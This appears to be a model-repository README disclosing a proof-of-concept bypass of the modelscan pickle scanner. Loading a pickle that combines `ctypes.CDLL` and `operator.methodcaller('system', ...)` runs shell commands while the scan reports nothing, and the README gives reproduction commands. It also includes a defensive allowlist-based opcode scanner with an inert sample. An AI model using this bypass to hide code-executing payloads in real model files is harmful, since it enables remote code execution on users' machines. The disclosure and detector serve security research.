---
license: mit
---

# ModelScan Bypass PoC — ctypes.CDLL + operator.methodcaller

Demonstrates that `ctypes.CDLL` combined with `operator.methodcaller` bypasses modelscan v0.7.6 for native code execution.
## Vulnerability

- `ctypes.CDLL(None)` loads the default C library (libc)
- `operator.methodcaller("system", b"cmd")` calls `.system(cmd)` on any object it is applied to
- Combined: executes arbitrary shell commands via libc's `system()` function
- Neither `ctypes` nor `operator.methodcaller` is in modelscan's blocklist
## Impact

Native RCE — bypasses Python exec entirely. Calls libc `system()` directly via the ctypes FFI. This is the most dangerous variant, as it cannot be mitigated by Python-level sandboxing.
## Reproduction

```bash
pip install modelscan==0.7.6
modelscan scan -p pytorch_model.bin
# Output: No issues found
python3 -c "import pickle; pickle.load(open('pytorch_model.bin','rb'))"
# Executes arbitrary shell commands via libc
```
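As an added example (not part of this PoC repository or of modelscan), the detection side of the blocklist gap described above: a scanner that walks the pickle opcode stream with `pickletools.genops` without ever unpickling, and reports every imported global that is not on an allowlist, so `ctypes.CDLL` and `operator.methodcaller` are flagged even though no blocklist names them. The sample pickle bytes and the allowlist entries are constructed here for illustration.

```python
import pickletools

# Constructed scanner input (not a real model file): GLOBAL opcodes naming the
# two imports discussed above, each followed by POP. There is no REDUCE, so the
# stream performs no call if loaded; it exists only to exercise the scanner.
SAMPLE_BYPASS = (
    b"\x80\x02"                    # PROTO 2
    b"cctypes\nCDLL\n0"            # GLOBAL ctypes.CDLL, POP
    b"coperator\nmethodcaller\n0"  # GLOBAL operator.methodcaller, POP
    b"N."                          # NONE, STOP
)

# Constructed benign input: the single import a plain OrderedDict state_dict needs.
SAMPLE_BENIGN = b"\x80\x02ccollections\nOrderedDict\n)R."

# Allowlist (assumption: tune to the checkpoints you actually load). Anything not
# listed is reported, which is what closes a blocklist gap of this kind.
ALLOWED_GLOBALS = {
    ("collections", "OrderedDict"),
    ("torch._utils", "_rebuild_tensor_v2"),
    ("torch", "FloatStorage"),
}

STRING_OPS = {"UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}


def find_globals(data):
    """Yield (module, name, offset) for every import opcode, without unpickling."""
    recent_strings = []  # STACK_GLOBAL (protocol 4) takes the two most recent strings
    for op, arg, pos in pickletools.genops(data):
        if op.name in ("GLOBAL", "INST"):
            module, name = arg.split(" ", 1)  # pickletools joins the pair with a space
            yield module, name, pos
        elif op.name == "STACK_GLOBAL" and len(recent_strings) >= 2:
            yield recent_strings[-2], recent_strings[-1], pos
        elif op.name in STRING_OPS:
            recent_strings.append(arg)


def scan_pickle(data):
    """Return imports that are not allowlisted; an empty list means no finding."""
    return [(m, n, pos) for m, n, pos in find_globals(data)
            if (m, n) not in ALLOWED_GLOBALS]


if __name__ == "__main__":
    for label, blob in (("bypass", SAMPLE_BYPASS), ("benign", SAMPLE_BENIGN)):
        print(label, scan_pickle(blob))
```

Run against a real checkpoint by passing the file's bytes to `scan_pickle`; the offsets point at the offending opcode in the stream.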